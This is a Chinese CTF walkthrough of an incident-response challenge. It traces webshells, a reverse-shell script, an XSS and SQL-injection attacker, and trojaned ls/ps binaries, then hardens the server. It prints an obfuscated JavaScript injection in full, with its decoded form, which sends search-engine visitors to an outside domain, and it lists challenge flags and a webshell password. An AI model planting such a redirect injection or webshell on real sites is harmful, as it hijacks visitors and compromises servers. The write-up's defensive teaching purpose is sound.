获取js劫持域名,直接访问靶机ip,发现自动跳转到https://www.194nb.com上,直接提交flag即可
分析/var/log/nginx/access.log下的日志
发现shell在/var/www/html/public/Uploads/6127418cad73c.php中
还有一种方法就是访问网站,然后抓包,页面会自动访问6127418cad73c.php
进入服务器cat即可看到密码
密码为:QjsvWsp6L84Vl9dRTTytVyn5xNr1
上方木马恶意的IP为123.139.39.161
查找该恶意IP的恶意请求即可,前面一次是xss,后面是SQL注入,题目问的是首次攻击,所以填xss,注意需要小写
执行ps -aux看看当前进程,筛选出www-data用户的进程
发现有一个恶意的1.sh,读出来发现是一个反弹shell的脚本
黑客的webshell2,在/var/www/html/public/static/img/1.php中
连接上之前黑客的webshell,本处只是为了方便操作数据库,实际操作建议在终端进入mysql操作
连接数据库,数据库账号密码在/var/www/html/application/database.php中
连接蚁剑执行查看mysql是否有文件写入权限:
-
SHOW VARIABLES LIKE "secure_file_priv";
可以看到my.cnf中的secure-file-priv值为空,也就是可以在服务器上随意写文件
将secure-file-priv修改为NULL
重启mysql即可
-
/etc/init.d/mysql restart
修复成功
查看当前所有账号
删除黑客aman的账号
-
ps -u aman(确认aman用户下没有别的进程)
-
userdel -r aman(删除账号)
成功修复
题目要修复黑客篡改的命令,进入/bin目录找,其中ls和ps可疑(其实执行的就可以发现有点问题,正常ls命
令执行的时候一行有好几个文件和文件名,这个冒牌货ls执行的时候,每一个文件和文件名都占一行)
经过cat后发现,ls和ps是冒牌货,ls2和ps是正牌货
_
删除ls和ps,并且把正版的ls2和ps_恢复,并且把冒牌货ls中用echo写入的“不死马”删除
-
rm -rf ls
-
rm -rf ps
-
mv ls2 ls
-
mv ps_ ps
-
rm -rf /var/www/html/public/static/img/1.php
点击修复即可
由于访问网页会跳转,所以抓个包看看,发现有一段神秘代码
<script type="text/javascript">
['sojson.v4']["x66x69x6cx74x65x72"]["x63x6fx6ex73x74x72x75x63x74x6fx72"](((['sojson.v4'] + [])["x63x6fx6ex73x74x72x75x63x74x6fx72"]['x66x72x6fx6dx43x68x61x72x43x6fx64x65']['x61x70x70x6cx79'](null, "118G97R114N32J74g116J114Y118p103G49c32T61Y32d47A46N40K115V111q103P111B117l124o115s111l124B104h97D111n115m111n117O124d98k97I105I100N117x124f103Q111F111c103Z108V101c124d121G111z117u100F97g111O124Z121H97f104S111y111o124E98Q105z110c103T124g103u111M117B103K111o117P124G49k49s56V49J49n52v124n118l110D101M116P124Z51Z54q48u124T105U111n97v103E101B124M115M109k124c115g112u41V40c46b91L97K45V122y48i45I57A47Y45W93K43U41d123n49Z44v50m125f47a105K103A59v10A32z32q32W32P118d97E114f32v109B95n103j103M50Q32t61p32U119Q105h110E100t111Y119i91G34w100O111Z99P117L109L101D110Q116t34q93i91y34R114L101Z102T101G114h114l101K114l34c93e59S10l32M32t32o32Z105V102t32K40f74k116N114O118N103X49g91e34D116V101g115a116w34w93Z40x109g95a103V103X50I41a41p32U123X10w32W32p32q32j32U32K32o32l119G105M110B100c111g119Q91G34U108n111m99J97t116J105R111i110w34X93a91A34w104H114V101v102R34Y93z32e61X32t34a104O116T116K112S115V58O47Z47a119o119w119J46E49i57T52E110e98V46S99A111e109M34W10D32x32N32Y32h32r32b32V32t104h61C123M102w108T97l103Q58b34K123b110u119T109o98W56S114O107F116y53T110e117r110k51o112P105Y102U53q119y115t46w121o97A52d110H107K115c48y50N122w107G125u34a125a59j10A32j32G32h32t125F32p101d108a115h101r32u123k10e32E32A32y32b32j32a32x32M108Y111f99g97r116F105J111J110W91e39n104I114S101N102D39Y93f32F61d32D34L104T116c116v112e115f58t47B47F119P119l119u46t49Z57X52R110r98X46s99B111W109L34a10f32q32g32f32T125" ['x73x70x6cx69x74'](/[a-zA-Z]{1,}/))))('sojson.v4');
</script
还原后如下,大概就是自动跳转到194nb的网站去
•ar Jtrvg1 = /.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(.[a-z0-9/-]+){1,2}/ig;
var m_gg2 = window["document"]["referrer"];
if (Jtrvg1["test"](m_gg2)) {
window["location"]["href"] = "https://www.194nb.com"
h={flag:"{nwmb8rkt5nun3pif5ws.ya4nks02zk}"};
} else {
location['href'] = "https://www.194nb.com"
现在只需要找到对应的文件删除代码即可
找到了文件路径为:/var/www/html/application/home/view/public/js.html
删除后check即可通关
原文始发于微信公众号(7coinSec):Bugku 应急加固1 通关详解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论